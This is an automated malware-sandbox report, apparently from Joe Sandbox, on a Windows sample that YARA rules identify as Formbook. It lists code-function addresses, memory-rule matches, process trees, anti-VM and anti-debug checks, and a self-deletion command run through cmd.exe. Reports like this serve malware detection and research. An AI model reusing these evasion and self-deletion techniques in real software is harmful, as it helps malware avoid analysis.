          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B01002
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A64120
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A4F900
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B122AE
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04AFFA2B
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A7EBB0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B0DBD2
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B003DA
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04B12B28
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_04A6AB40
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B6A2A6
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B6CEF6
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B52FB0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B58C60
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B58C5C
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 3_2_02B52D90
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll 29943F203F544CD1F2B51396E1B371B017B705A3D43FF16E3A8FCC7350E629D9
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: String function: 00B3B150 appears 45 times
          Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04A4B150 appears 48 times
          Source: 4oItdZkNOZ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 4oItdZkNOZ.exe, 00000000.00000003.341791860.000000001EF56000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 4oItdZkNOZ.exe
          Source: 4oItdZkNOZ.exe, 00000001.00000002.388375674.0000000000C2F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 4oItdZkNOZ.exe
          Source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamecscript.exe` vs 4oItdZkNOZ.exe
          Source: 4oItdZkNOZ.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@15/9
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:952:120:WilError_01
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe File created: C:\Users\user\AppData\Local\Temp\nsa770C.tmp
          Source: 4oItdZkNOZ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: 4oItdZkNOZ.exe Virustotal: Detection: 30%
          Source: 4oItdZkNOZ.exe ReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe File read: C:\Users\user\Desktop\4oItdZkNOZ.exe
          Source: unknown Process created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Process created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Process created: C:\Users\user\Desktop\4oItdZkNOZ.exe 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe'
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cscript.pdbUGP source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 4oItdZkNOZ.exe, 00000000.00000003.341988783.000000001EFD0000.00000004.00000001.sdmp, 4oItdZkNOZ.exe, 00000001.00000002.388229067.0000000000B10000.00000040.00000001.sdmp, cscript.exe, 00000003.00000002.604526316.0000000004B3F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 4oItdZkNOZ.exe, cscript.exe
          Source: Binary string: cscript.pdb source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeUnpacked PE file: 1.2.4oItdZkNOZ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: m9c3uhgbfqo.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00415047 pushad ; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041600E pushad ; retf
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00411254 push edi; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00414D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B8D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_1_00415047 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_04A9D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6C2CD push ss; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B61254 push edi; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6600E pushad ; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B50008 push ss; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B65047 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B402 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B40B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B6B46C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 3_2_02B64D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exe File created: C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002B585E4 second address: 0000000002B585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002B5897E second address: 0000000002B58984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 244Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 5772Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.367245380.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.367199295.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.367881772.0000000008540000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.362134122.000000000640E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.367199295.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.362134122.000000000640E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.367028557.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.367028557.00000000082E2000.00000004.00000001.sdmpBinary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.367028557.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000002.00000000.367245380.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000002.00000002.603524845.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000002.00000000.360675289.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_026918CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_026916B4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]
